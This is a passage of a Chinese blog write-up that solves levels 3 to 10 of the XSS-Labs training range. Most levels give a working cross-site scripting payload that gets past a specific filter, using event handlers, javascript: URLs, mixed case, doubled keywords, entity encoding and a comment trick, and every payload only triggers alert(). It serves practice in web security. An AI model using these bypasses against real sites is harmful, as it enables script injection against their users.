<h3 id="level3"><a href="#level3" class="headerlink" title="level3"></a>level3</h3><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="image-20260530151727875.png"  alt="image-20260530151727875" style="zoom:50%;" >

<p>查看源码：</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260530151741661.png"  alt="image-20260530151741661"></p>
<p>在搜索框尝试xss</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260530151910321.png"  alt="image-20260530151910321"></p>
<p>两处的尖括号都被实体化了</p>
<p>使用事件性：</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#x27; onfocus=javascript:alert() &#x27;</span><br><span class="line">&#x27; onmouseup=javascript:alert() &#x27;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>&#96;&#96;javascript:<code>是浏览器支持的一种 URL 协议。当浏览器访问以</code>javascript:<code> 开头的 URL 时，不会发送网络请求，而是直接执行后面的 JavaScript 代码。</code></p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260531090714777.png"  alt="image-20260531090714777"></p>
<p>成功触发xss</p>
<img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="image-20260531090755213.png"  alt="image-20260531090755213" style="zoom:50%;" >

<h3 id="level4"><a href="#level4" class="headerlink" title="level4"></a>level4</h3><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="image-20260531091402907.png"  alt="image-20260531091402907" style="zoom:67%;" >

<p>查看源码：</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260531091445902.png"  alt="image-20260531091445902"></p>
<p>继续使用事件性：</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&quot; onfocus=javascript:alert() &quot;</span><br><span class="line">&quot; onmouseup=javascript:alert() &quot;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="image-20260531091541409.png"  alt="image-20260531091541409" style="zoom:50%;" >

<h3 id="level5"><a href="#level5" class="headerlink" title="level5"></a>level5</h3><p>尝试源码，继续使用事件性：</p>
<p>对on进行了过滤：</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260531091942380.png"  alt="image-20260531091942380"></p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260531092201812.png"  alt="image-20260531092201812"></p>
<p>尝试scrip标签，inpu标签处没有进行实体化，但是script被过滤了</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;&lt;script&gt;alert(111)&lt;/script&gt;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260531092959032.png"  alt="image-20260531092959032"></p>
<p>尝试其他标签。使用iframe 标签，成功触发xss</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;&lt;iframe src=&quot;javascript:alert(&#x27;xss&#x27;)&quot;&gt;&lt;iframe&gt;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>或者href标签：</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt; &lt;a href=&quot;javascript:alert(1)&quot;&gt;click me&lt;/a&gt;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260531093751742.png"  alt="image-20260531093751742"></p>
<h3 id="level6"><a href="#level6" class="headerlink" title="level6"></a>level6</h3><p>过滤了src</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260531094111136.png"  alt="image-20260531094111136"></p>
<p>href也过滤了：</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260531094214472.png"  alt="image-20260531094214472"></p>
<p>使用大小写绕过：</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;&lt;iframe sRC=&quot;javascript:alert(&#x27;xss&#x27;)&quot;&gt;&lt;iframe&gt;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260531095105255.png"  alt="image-20260531095105255"></p>
<h3 id="level7"><a href="#level7" class="headerlink" title="level7"></a>level7</h3><p>尝试：</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;&lt;iframe sRC=&quot;javascript:alert(&#x27;xss&#x27;)&quot;&gt;&lt;iframe&gt;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260531095349204.png"  alt="image-20260531095349204"></p>
<p>过滤了script，src等，直接进行了清除</p>
<p>尝试双写：</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;&lt;iframe ssrcrc=&quot;javascrscriptipt:alert(&#x27;xss&#x27;)&quot;&gt;&lt;iframe&gt;</span><br><span class="line">&quot;&gt; &lt;a hrhrefef=&quot;javascrscriptipt:alert(1)&quot;&gt;click me&lt;/a&gt;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260531095610295.png"  alt="image-20260531095610295"></p>
<p>成功触发</p>
<h3 id="level8"><a href="#level8" class="headerlink" title="level8"></a>level8</h3><p>有两处可以进行尝试xss</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260531100122465.png"  alt="image-20260531100122465"></p>
<p>尝试：</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">javascript:alert(1)</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="image-20260531100357685.png"  alt="image-20260531100357685" style="zoom:80%;" >

<p>对javascript，script进行了过滤</p>
<p>对引号进行了实体化</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260531100653385.png"  alt="image-20260531100653385"></p>
<p>将javascirpt:alert(1)进行<a target="_blank" rel="noopener" href="https://www.qqxiuzi.cn/bianma/zifushiti.php">字符实体化</a>，避开过滤</p>
<img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="image-20260531102038626.png"  alt="image-20260531102038626" style="zoom:67%;" >

<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&amp;#x6A;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3A;&amp;#x61;&amp;#x6C;&amp;#x65;&amp;#x72;&amp;#x74;&amp;#x28;&amp;#x31;&amp;#x29;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260531102022648.png"  alt="image-20260531102022648"></p>
<h3 id="level9"><a href="#level9" class="headerlink" title="level9"></a>level9</h3><p>一处可进行尝试：</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260531102537512.png"  alt="image-20260531102537512"></p>
<p>但是进行了实体化</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260531102709823.png"  alt="image-20260531102709823"></p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot; onfocus=javascript:alert() &quot;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>源码:</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if(false===strpos($str7,&#x27;http://&#x27;))</span><br><span class="line">&#123;</span><br><span class="line">  echo &#x27;&lt;center&gt;&lt;BR&gt;&lt;a href=&quot;您的链接不合法？有没有！&quot;&gt;友情链接&lt;/a&gt;&lt;/center&gt;&#x27;;</span><br><span class="line">        &#125;</span><br><span class="line">else</span><br><span class="line">&#123;</span><br><span class="line">  echo &#x27;&lt;center&gt;&lt;BR&gt;&lt;a href=&quot;&#x27;.$str7.&#x27;&quot;&gt;友情链接&lt;/a&gt;&lt;/center&gt;&#x27;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>后端对输入进行了判断，但是不严谨，只要输入字符中存在http:&#x2F;&#x2F;就可以。</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">javascript:alert(1)</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260531103814110.png"  alt="image-20260531103814110"></p>
<p>对javascript进行了过滤</p>
<img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="image-20260531104542653.png"  alt="image-20260531104542653" style="zoom:80%;" >

<p>实体化字符：</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&amp;#x6A;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3A;&amp;#x61;&amp;#x6C;&amp;#x65;&amp;#x72;&amp;#x74;&amp;#x28;&amp;#x31;&amp;#x29;//http://</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><code>//对http://进行注释</code></p>
<img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="image-20260531104518927.png"  alt="image-20260531104518927" style="zoom: 80%;" >

<h3 id="level10"><a href="#level10" class="headerlink" title="level10"></a>level10</h3><p>查看源码存在3处可输入的地方，但只有2处可回显：</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260531105722052.png"  alt="image-20260531105722052"></p>
<p>h2标签进行了实体化</p>
<p>input对&lt;&gt;进行了过滤，清除</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260531110507341.png"  alt="image-20260531110507341"></p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot; onfocus=javascript:alert() &quot;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260531110925108.png"  alt="image-20260531110925108"></p>
<p>但是这个标签是隐蔽的，onfocus是当元素获得焦点时触发，即鼠标点击才会触发</p>
<p>将type改为text</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;  type=&quot;text&quot; onfocus=javascript:alert(111) &quot;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path 